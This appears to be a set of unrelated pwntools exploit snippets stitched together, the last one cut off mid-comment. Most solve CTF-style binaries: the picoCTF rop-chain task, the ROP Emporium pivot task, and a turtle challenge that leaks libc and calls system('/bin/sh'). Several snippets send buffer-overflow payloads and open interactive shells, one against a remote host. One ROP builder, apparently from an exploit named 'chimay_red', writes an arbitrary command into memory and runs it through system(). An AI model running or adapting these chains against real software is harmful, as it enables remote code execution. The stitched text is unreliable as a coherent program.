def __init__(self, binary: ELF, command=None): default_command = "/bin/touch /tmp/foobar-" + "".join( random.sample(string.ascii_letters, 5)) self._chain = None self._offsets = None self._command = command or default_command with context.local(): context.log_level = "WARNING" # Suppress ELF metadata print from pwntools if isinstance(binary, str): if os.path.isfile(binary): self.binary = binary = ELF(binary) if not isinstance(binary, ELF): self.binary = binary = ELF.from_bytes(b"\x90" * 262144, vma=0x8048000) self.rop = ROP([binary]) else: self.binary = binary context.binary = self.binary.path self.rop = ROP([binary]) context.arch = _bfdarch_patch() self.context = context self.build_offsets()
def loadOffsets(binary, shellCmd): elf = ELF(binary) rop = ROP(elf) # www PLT symbols plt["strncpy"] = elf.plt['strncpy'] plt["dlsym"] = elf.plt['dlsym'] # Gadgets to clean the stack from arguments gadgets['pppp'] = rop.search(regs=["ebx", "esi", "edi", "ebp"]).address gadgets['ppp'] = rop.search(regs=["ebx", "ebp"], move=(4*4)).address gadgets['pp'] = rop.search(regs=["ebx", "ebp"]).address gadgets['p'] = rop.search(regs=["ebp"]).address # Gadget to jump on the result of dlsym (address of system) gadgets['jeax'] = ropSearchJmp(elf, "jmp eax") system_chunks.extend(searchStringChunksLazy(elf, "system\x00")) cmd_chunks.extend(searchStringChunksLazy(elf, shellCmd + "\x00")) # get the address of the first writable segment to store strings writable_address = elf.writable_segments[0].header.p_paddr strings['system'] = writable_address strings['cmd'] = writable_address + 0xf
def build_payload() -> bytes: rop = ROP(BINARY_PATH) for binary_function in BINARY_FUNCTIONS: rop.call(binary_function) rop.raw(LAST_ROP_ADDRESS) payload = b'4\n' payload += b'A' * 120 payload += bytes(rop) + b'\n' return payload
def main(): elf = ExploitInfo.elf addr___libc_stack_end = elf.sym['__libc_stack_end'] addr___stack_prot = elf.sym['__stack_prot'] MEM_PROT_FLAG = constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC POP_EAX_RET = 0x80b81c6 POP_EBX_RET = 0x80481c9 POP_ECX_RET = 0x80de955 POP_EDX_RET = 0x806f02a XOR_EAX_EAX_RET = 0x8049303 INC_EAX_RET = 0x807a86f MOV_DWORD_EDX_EAX_RET = 0x80549db POP_ESI_RET = 0x8048433 POP_EDI_RET = 0x8048480 INT_80 = 0x806cc25 PUSH_ESP_RET = 0x080b81d6 rop = ROP(elf) rop.raw(POP_EDX_RET) rop.raw(addr___stack_prot) # edx = &__stack_prot rop.raw(XOR_EAX_EAX_RET) for x in range(MEM_PROT_FLAG): # eax = MEM_PROT_FLAG rop.raw(INC_EAX_RET) rop.raw(MOV_DWORD_EDX_EAX_RET) # __stack_prot = MEM_PROT_FLAG rop.raw(POP_EAX_RET) # rop.raw(addr___libc_stack_end) # eax = &__libc_stack_end rop.call('_dl_make_stack_executable' ) # _dl_make_stack_executable(&__libc_stack_end) rop.raw(PUSH_ESP_RET) p = get_process() payload = 'A' * ExploitInfo.offset_eip payload += rop.chain() payload += ExploitInfo.shellcode_i386 assert ('\x00' not in payload) p.clean() log.info("Sending: %r", payload) p.sendline(payload) p.clean(timeout=0.5) p.clean(timeout=0.5) log.success("Here are your shell!") p.sendline('ls -la') p.interactive() p.close()
def setRegisters(elf, registers): from pwn import ROP rop = ROP(elf) for t in rop.setRegisters(registers): value = t[0] gadget = t[1] if type(gadget) == pwnlib.rop.gadgets.Gadget: rop.raw(gadget.address) for reg in gadget.regs: if reg in registers: rop.raw(registers[reg]) else: rop.raw(0) return rop
def make_binary(): # junk code generation write_junk_calls("main.c", 31, 2) write_junk_calls("main.c", 22) write_junk_body("main.c", 16) subprocess.call("make", stdout=FNULL, stderr=FNULL) # input correction elf = ELF("simple_rop_2") rop = ROP(elf) win1 = elf.symbols['win_function1'] win2 = elf.symbols['win_function2'] flag = elf.symbols['flag'] POP_ONCE = (rop.find_gadget(['pop rdi', 'ret']))[0] RET = (rop.find_gadget(['ret']))[0] padding = b'A' * 24 exploit = padding + p64(win1) + p64(win2) exploit += p64(POP_ONCE) + p64(0xABADBABE) + p64(RET) + p64(flag) # rop is saved as input f = open("input", "wb") f.write(exploit) f.close() # strip it after the ropchain building so they don't have the symbols but we do subprocess.call(["strip", "simple_rop_2"], stdout=FNULL, stderr=FNULL) # TESTING BINARY f = open("flag.txt", 'r') flag = f.readline() try: output = subprocess.check_output("./simple_rop_2 < input", shell=True, stderr=subprocess.STDOUT) except Exception as e: output = str(e.output) if not flag in output: return -1 else: return 0
def main(): elf_name = '/problems/rop-chain_2_d25a17cfdcfdaa45844798dd74d03a47/rop' elf = ELF(elf_name) offset_buf_to_eip = 0x18 + 4 p = process(elf_name) rop_chain = ROP(elf) rop_chain.win_function1() rop_chain.win_function2(0xBAAAAAAD) rop_chain.flag(0xDEADBAAD) log.info(rop_chain.dump()) payload = 'A' * offset_buf_to_eip payload += str(rop_chain) assert ('\n' not in payload) p.sendlineafter('input> ', payload) print(p.recv(4096))
#################### #### CONNECTION #### #################### LOCAL = False REMOTETTCP = True REMOTESSH = False GDB = False LOCAL_BIN = "./vuln" REMOTE_BIN = "~/vuln" #For ssh LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it if LOCAL: P = process(LOCAL_BIN) # start the vuln binary ELF_LOADED = ELF(LOCAL_BIN) # Extract data from binary ROP_LOADED = ROP(ELF_LOADED) # Find ROP gadgets elif REMOTETTCP: P = remote('10.10.10.10', 1339) # start the vuln binary ELF_LOADED = ELF(LOCAL_BIN) # Extract data from binary ROP_LOADED = ROP(ELF_LOADED) # Find ROP gadgets elif REMOTESSH: ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='******', port=2220) p = ssh_shell.process(REMOTE_BIN) # start the vuln binary elf = ELF(LOCAL_BIN) # Extract data from binary rop = ROP(elf) # Find ROP gadgets
def build_ropchain(self, offsets=None): """ Command Eg. "ls -la" system_chunks = [134512899, 134513152, 134512899, 134512854, 134514868, 134514240, 134512693] ("s", "y", "s", "t", "e", "m", "\x00") cmd_chunks = [134512899, 134513152, 134512899, 134512854, 134514868, 134514240, 134512693] ("l", "s", " ", "-", "l", "a", "\x00") Psuedocode: ----------------------------- char_size = 1 char_pointer = 0 for address in cmd_chunks: rop.call(<strncpy>, args=(<writeable_segment_addr> + char_pointer, address, char_size)) char_pointer += 1 |<<<< rop.call(<dlsym>, args=(0, "system")) | | eax = resultant pointer of dlsym() | |>>>> rop.call(<jmp eax>, args=(<command>)) ----------------------------- """ char_size = 1 cmd_chunks = list() system_chunks = list() if offsets: self._offsets = offsets for gadget_name, gadget in self.offsets.gadgets.items(): if "pivot" in gadget_name: self.binary.asm(gadget.address, "; ".join(gadget.insns)) self.binary.save("/tmp/chimay_red.elf") with context.local(): context.log_level = "WARNING" # Suppress ELF metadata print from pwntools self.rop = ROP([ELF("/tmp/chimay_red.elf")]) ascii_chunks = self.offsets.strings.get("ascii_chunks") if not ascii_chunks: log.critical("Offsets are currently not built!") for char in "system" + "\x00": if ascii_chunks.get(char): system_chunks.append(ascii_chunks[char]) else: log.critical( "Unable to locate enough readable characters in the binary to craft system chunks" ) for char in self.command + "\x00": if ascii_chunks.get(char): cmd_chunks.append(ascii_chunks[char]) else: log.critical( "Unable to locate enough readable characters in the binary to craft desired command" ) for length, address in zip(range(len(system_chunks)), system_chunks): self.rop.call(self.offsets.plt.get("strncpy"), [ self.offsets.strings.get("system") + length, address, char_size ]) # print("EXPLOIT STAGE 1 (SYSTEM CHUNKS): ", hexlify(self.rop.chain())) for length, address in zip(range(len(cmd_chunks)), cmd_chunks): self.rop.call( self.offsets.plt.get("strncpy"), [self.offsets.strings.get("cmd") + length, address, char_size]) # print("EXPLOIT STAGE 2 (CMD CHUNKS): ", hexlify(self.rop.chain())) self.rop.call(self.offsets.plt.get("dlsym"), [0, self.offsets.strings.get("system")]) # print("EXPLOIT STAGE 3 (SYSTEM CHUNKS): ", hexlify(self.rop.chain())) self.rop.call(self.offsets.gadgets.get("jmp_eax"), [self.offsets.strings.get("cmd")]) # print("EXPLOIT 4: ", hexlify(self.rop.chain())) self._chain = self.rop.chain()
def exploit(self): elf = self.elf libc = self.libc libc.symbols['OneGadget'] = 0x41320 libc.symbols['/bin/sh'] = 0x001633e8 base_data = 0x80 # (gdb) x/xg 0x00601560 # 0x601560: 0x0000001500000064 Turtle_say_sel_id = 0x0000001500000064 with self.get_process(ld_linux=True) as self.p: # -- stage 1 --------------------------------------------------------------- ADDR_turtle = self.get_turtle_address() log.info('turtle : %s', hex(ADDR_turtle)) data = '%sEND' ADDR_data = ADDR_turtle + base_data rop_chain = ROP(elf) rop_chain.printf(ADDR_data, elf.got['setvbuf']) rop_chain.main() log.debug('ROP CHAIN: \n%s', rop_chain.dump()) payload = Attack.create_fake_turtle(ADDR_turtle, rop_chain.chain(), data, Turtle_say_sel_id) assert ('\n' not in payload) self.p.sendline(payload) if args.GDB: pause() leak = self.p.recvuntil('END', drop=True) ADDR_setvbuf = u64(leak.ljust(8, '\x00')) libc.address = ADDR_setvbuf - libc.symbols['setvbuf'] ADDR_bin_sh = libc.symbols['/bin/sh'] log.info('setvbuf : %s', hex(ADDR_setvbuf)) log.info('libc : %s', hex(libc.address)) log.info('/bin/sh : %s', hex(ADDR_bin_sh)) # -- stage 2 --------------------------------------------------------------- if args.GDB: pause() ADDR_turtle1 = self.get_turtle_address() log.info('turtle2 : %s', hex(ADDR_turtle1)) data = '/bin/sh\x00' ADDR_data = ADDR_turtle1 + base_data rop_chain2 = ROP(libc) rop_chain2.system(ADDR_bin_sh) log.debug('ROP CHAIN: \n%s', rop_chain2.dump()) payload = Attack.create_fake_turtle(ADDR_turtle1, rop_chain2.chain(), data, Turtle_say_sel_id) assert ('\n' not in payload) self.p.sendline(payload) self.p.sendline('ls -laF') self.p.sendline('cat flag*') self.p.interactive()
from pwn import process, ELF, ROP, packing, context, gdb context.log_level = 'critical' # enable/disable aslr: echo 2 | sudo tee /proc/sys/kernel/randomize_va_space, echo 0 | sudo tee /proc/sys/kernel/randomize_va_space e = ELF("pivot") l = ELF("libpivot.so") p = process(e.path) r = ROP(e) pid = gdb.attach(p) # opens a new shell for gdb debugging rop_addr = p.recvuntil("> ").split(b":")[1].split(b"\n")[0].lstrip().decode() print("pivot @: " + rop_addr) ''' pop rax; ret xchg rsp, rax; ret allows us to set the stack pointer to anything we want. exploit logic: 1) set stack pointer to 0x7ffff7be4f10 using xchg ---rop chain--- 2) call foothold_function - this updates its entry in the .got.plt table 3) alter .got.plt address of .got.plt to be the address of the ret2win function in libpivot: - pop rax - addr_of_plt_got_foothold_function - mov rax, qword ptr [rax] - pop rbp